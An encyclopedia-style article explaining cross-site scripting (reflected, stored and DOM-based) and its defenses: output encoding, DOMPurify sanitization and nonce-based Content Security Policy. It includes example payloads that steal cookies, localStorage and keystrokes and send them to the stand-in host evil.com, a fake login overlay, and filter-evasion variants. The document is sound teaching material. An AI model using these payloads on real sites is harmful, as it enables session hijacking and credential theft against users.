Cross Site Scripting (Web Security)

Introduction

Cross-Site Scripting (XSS) is a class of injection vulnerability in which an attacker inserts malicious client-side scripts into web pages viewed by other users. When a victim's browser renders the compromised page, the injected script executes with the same privileges as legitimate scripts from that origin, giving the attacker access to cookies, session tokens, and the full DOM of the page.

XSS has consistently ranked among the top web application vulnerabilities since OWASP began publishing its Top Ten list in 2003. Despite being well understood for over two decades, XSS remains pervasive because it can appear anywhere user-controlled data is reflected in a page without adequate encoding or sanitization.

The name "Cross-Site Scripting" originates from the original attack model, where a malicious site would inject script into a different (trusted) site. Though the name is somewhat misleading today -- most XSS attacks do not literally cross between sites -- the term persists as the standard designation for this vulnerability class.

"XSS is the new buffer overflow, JavaScript is the new shell code." -- Jeremiah Grossman, founder of WhiteHat Security, on the prevalence and impact of XSS in modern web applications

How XSS Works

At its core, every XSS attack follows the same pattern: untrusted data enters a web application through a user-controllable input, and that data is subsequently included in dynamic content sent to another user's browser without proper validation, encoding, or escaping. The browser has no way to distinguish between the legitimate scripts authored by the developer and the malicious scripts injected by the attacker -- both execute with the full authority of the page's origin.

The consequences of successful XSS exploitation include:

Session hijacking: Stealing session cookies to impersonate the victim. See Session Hijacking for details.
Credential theft: Injecting fake login forms or keyloggers to capture usernames and passwords.
Defacement: Modifying the visible content of the page to display false or malicious information.
Malware distribution: Redirecting users to malicious sites or triggering drive-by downloads.
Cryptojacking: Using the victim's browser to mine cryptocurrency.
CSRF bypass: Using XSS to read anti-CSRF tokens and forge authenticated requests.

XSS Type	Payload Location	Persistence	Server Involvement	Typical Impact
Reflected	URL parameter or form input	Non-persistent	Server reflects input in response	Single user per crafted link
Stored	Database, file, or message	Persistent	Server stores and serves payload	All users who view content
DOM-Based	Client-side JavaScript	Non-persistent	Server may not be involved	Single user per crafted link

Reflected XSS

Reflected XSS (also called non-persistent XSS) occurs when user input is immediately returned by the server in the HTTP response without proper encoding. The malicious script is not stored on the server; instead, it is embedded in a URL or form submission that the victim must be tricked into clicking or submitting.

A typical reflected XSS scenario involves a search page that displays the user's query in the results. If the server inserts the query directly into the HTML without encoding, an attacker can craft a URL containing a script payload.

<!-- Vulnerable server-side code (PHP example) --><p>You searched for: <?php echo $_GET['q']; ?></p><!-- Attacker crafts this URL: -->https://example.com/search?q=<script>document.location='https://evil.com/steal?c='+document.cookie</script><!-- The browser renders: --><p>You searched for: <script>document.location='https://evil.com/steal?c='+document.cookie</script></p>

The attacker distributes the malicious URL through phishing emails, social media posts, or advertisements. When the victim clicks the link, their browser sends the request to the legitimate server, which reflects the payload back in the response. The victim's browser then executes the script because it appears to originate from the trusted domain.

Reflected XSS is the most common form of XSS but generally requires social engineering to exploit, since each victim must individually click a crafted link. Modern browsers include some built-in XSS filters, but these are not comprehensive and should never be relied upon as a primary defense.

Stored XSS

Stored XSS (also called persistent XSS) occurs when the malicious payload is permanently saved on the target server -- typically in a database, comment field, forum post, user profile, or any other data store that serves content to other users. Every user who subsequently views the affected content will have the malicious script executed in their browser.

Stored XSS is considered more dangerous than reflected XSS because it does not require social engineering. The attacker injects the payload once, and it automatically affects every user who views the compromised content. A single stored XSS vulnerability in a popular web application can compromise thousands or millions of users.

<!-- Attacker submits this as a blog comment: -->Great article! <script> fetch('https://evil.com/log', { method: 'POST', body: JSON.stringify({ cookies: document.cookie, url: window.location.href, localStorage: JSON.stringify(localStorage) }) });</script><!-- The comment is stored in the database and rendered for every visitor -->

Real-world examples of stored XSS include the Samy worm (2005), which exploited a stored XSS vulnerability in MySpace to propagate a self-replicating payload that added over one million friends to the attacker's profile within 20 hours. The TweetDeck XSS worm (2014) similarly exploited stored XSS in Twitter's client to self-retweet across thousands of accounts.

DOM-Based XSS

DOM-based XSS occurs entirely on the client side. The vulnerability exists in client-side JavaScript that processes data from an attacker-controllable source (such as the URL fragment, document.referrer, or window.name) and passes it to a dangerous sink that supports dynamic code execution (such as innerHTML, eval(), or document.write()).

Unlike reflected and stored XSS, the malicious payload in DOM-based XSS may never be sent to the server. The attack occurs entirely within the browser, making it invisible to server-side security measures such as web application firewalls (WAFs).

// Vulnerable JavaScript codeconst userInput = document.location.hash.substring(1);document.getElementById('greeting').innerHTML = 'Hello, ' + userInput;// Attacker crafts URL:// https://example.com/page#<img src=x onerror=alert(document.cookie)>// The browser processes the fragment client-side// The img tag is injected into the DOM and the onerror handler fires

Dangerous Sources	Dangerous Sinks
document.location	element.innerHTML
document.URL	element.outerHTML
document.referrer	document.write()
window.name	eval()
location.hash	setTimeout() / setInterval() with strings
postMessage data	Function() constructor
Web Storage values	jQuery .html() / .append()

To prevent DOM-based XSS, developers must treat all client-side data sources as untrusted. Use textContent instead of innerHTML, avoid eval() and related functions, and apply context-appropriate encoding when inserting dynamic data into the DOM.

Common XSS Payloads

XSS payloads range from simple proof-of-concept alert boxes to sophisticated multi-stage attacks. Understanding common payloads helps security teams assess the real impact of XSS vulnerabilities and test their defenses effectively.

<!-- Classic proof-of-concept --><script>alert('XSS')</script><!-- Cookie theft --><script>new Image().src='https://evil.com/steal?c='+document.cookie</script><!-- Keylogger injection --><script>document.addEventListener('keypress', function(e) { fetch('https://evil.com/keys?k=' + e.key);});</script><!-- Phishing overlay --><div style="position:fixed;top:0;left:0;width:100%;height:100%;background:white;z-index:9999"> <h2>Session expired. Please log in again.</h2> <form action="https://evil.com/phish"> <input name="user" placeholder="Username"> <input name="pass" type="password" placeholder="Password"> <button>Log In</button> </form></div><!-- Filter evasion techniques --><img src=x onerror=alert(1)><svg onload=alert(1)><body onload=alert(1)><input onfocus=alert(1) autofocus><marquee onstart=alert(1)><details open ontoggle=alert(1)>

Attackers frequently use encoding tricks to bypass naive input filters. These include HTML entity encoding (<script>), URL encoding (%3Cscript%3E), Unicode encoding, mixed case (<ScRiPt>), and null byte injection. This is why blacklist-based filtering is fundamentally insufficient -- there are too many encoding variants to block them all.

Output Encoding

Output encoding is the primary defense against XSS. The principle is straightforward: whenever untrusted data is inserted into an HTML page, it must be encoded according to the context in which it appears. This ensures that the data is treated as data, not as executable code.

The critical insight is that different HTML contexts require different encoding rules. Data placed inside an HTML element body requires different encoding than data placed inside a JavaScript string, a URL parameter, or a CSS value.

Context	Example	Encoding Method	Characters Encoded
HTML Body	<p>USER_DATA</p>	HTML entity encoding	& < > " '
HTML Attribute	<input value="USER_DATA">	HTML attribute encoding	All non-alphanumeric characters
JavaScript	var x = 'USER_DATA';	JavaScript hex encoding	All non-alphanumeric characters
URL Parameter	<a href="/page?q=USER_DATA">	URL/percent encoding	All non-alphanumeric characters
CSS	background: USER_DATA;	CSS hex encoding	All non-alphanumeric characters

// Node.js / Express: using context-appropriate encoding// HTML body context -- encode HTML entitiesfunction encodeHTML(str) { return str.replace(/&/g, '&amp;') .replace(/</g, '&lt;') .replace(/>/g, '&gt;') .replace(/"/g, '&quot;') .replace(/'/g, '&#x27;');}// Most template engines auto-encode by default:// EJS: <%= userData %> (auto-encoded)// EJS: <%- userData %> (raw -- DANGEROUS)// Handlebars: {{userData}} (auto-encoded)// Handlebars: {{{userData}}} (raw -- DANGEROUS)// Jinja2: {{ userData }} (auto-encoded with autoescape=True)

"Output encoding is not optional. It is not a nice-to-have. Every single place where untrusted data enters an HTML page is a potential XSS vulnerability if the data is not encoded for the correct context." -- OWASP XSS Prevention Cheat Sheet

Input Sanitization

While output encoding is the primary defense, input sanitization provides a complementary layer of protection, particularly for applications that must accept rich HTML content (such as blog platforms, email clients, or content management systems). Sanitization removes or neutralizes potentially dangerous elements and attributes from HTML input while preserving safe formatting.

The gold standard for HTML sanitization is to use a well-tested library that parses the input into a DOM tree, walks the tree to remove disallowed elements and attributes, and then serializes the clean tree back to HTML. Writing your own HTML sanitizer using regular expressions is extremely error-prone and strongly discouraged.

// Server-side sanitization with DOMPurify (Node.js)const createDOMPurify = require('dompurify');const { JSDOM } = require('jsdom');const window = new JSDOM('').window;const DOMPurify = createDOMPurify(window);const dirty = '<p>Hello</p><script>alert("XSS")</script><img src=x onerror=alert(1)>';const clean = DOMPurify.sanitize(dirty);// Result: '<p>Hello</p><img src="x">'// The script tag and onerror handler are removed// Allow only specific tags and attributesconst strictClean = DOMPurify.sanitize(dirty, { ALLOWED_TAGS: ['p', 'b', 'i', 'em', 'strong', 'a'], ALLOWED_ATTR: ['href']});

Key principles of effective sanitization:

Use an allowlist, not a denylist. Define which elements and attributes are permitted rather than trying to block dangerous ones. New attack vectors are discovered regularly, and a denylist will always miss some.
Parse, don't regex. Regular expressions cannot reliably parse HTML. Use a proper HTML parser to build a DOM tree before filtering.
Sanitize on output, not just on input. Data may be transformed between storage and display, potentially reintroducing dangerous content.
Use established libraries. DOMPurify, Bleach (Python), and the OWASP Java HTML Sanitizer are battle-tested by security researchers worldwide.

Content Security Policy

Content Security Policy (CSP) is a browser security mechanism that provides a second line of defense against XSS. CSP allows a web application to declare which sources of content are legitimate, instructing the browser to block execution of scripts, styles, or other resources that do not match the policy. Even if an attacker successfully injects a script tag into a page, a properly configured CSP can prevent that script from executing.

CSP is delivered via an HTTP response header or a <meta> tag. The policy consists of directives that control different resource types.

# Strict CSP header exampleContent-Security-Policy: default-src 'self'; script-src 'self' 'nonce-abc123'; style-src 'self' 'unsafe-inline'; img-src 'self' data: https:; font-src 'self'; connect-src 'self' https://api.example.com; frame-ancestors 'none'; base-uri 'self'; form-action 'self'; report-uri /csp-report;# Using nonces (preferred over 'unsafe-inline' for scripts):# Server generates a unique nonce per request# Only script tags with the matching nonce attribute execute<script nonce="abc123"> // This script executes because the nonce matches console.log('Legitimate script');</script><script> // This injected script is BLOCKED -- no valid nonce alert('XSS attempt');</script>

A strict nonce-based CSP is the most effective configuration. Each page response includes a cryptographically random nonce value. Only <script> tags bearing the correct nonce attribute are permitted to execute. Since the attacker cannot predict the nonce, injected scripts are blocked even if the XSS payload successfully enters the page.

CSP should be deployed incrementally. Start with Content-Security-Policy-Report-Only to monitor violations without breaking functionality, review reports to identify legitimate resources that need to be allowlisted, and then switch to enforcement mode. CSP is a defense-in-depth measure -- it does not replace output encoding and sanitization but significantly reduces the impact of XSS when those primary defenses fail.

References

OWASP Foundation. (2023). OWASP Cross-Site Scripting Prevention Cheat Sheet. OWASP.
OWASP Foundation. (2021). OWASP Top Ten 2021: A03 Injection. OWASP.
Grossman, J. (2007). XSS Attacks: Cross Site Scripting Exploits and Defense. Syngress.
W3C. (2023). Content Security Policy Level 3. W3C Working Draft.
Heiderich, M. et al. (2017). "DOMPurify: Client-Side Protection Against XSS and Markup Injection." European Symposium on Research in Computer Security.
Lekies, S. et al. (2017). "Code-Reuse Attacks for the Web: Breaking Cross-Site Scripting Mitigations via Script Gadgets." ACM Conference on Computer and Communications Security.
Weichselbaum, L. et al. (2016). "CSP Is Dead, Long Live CSP! On the Insecurity of Whitelists and the Future of Content Security Policy." ACM Conference on Computer and Communications Security.
Kamkar, S. (2005). "Technical explanation of the MySpace worm." samy.pl.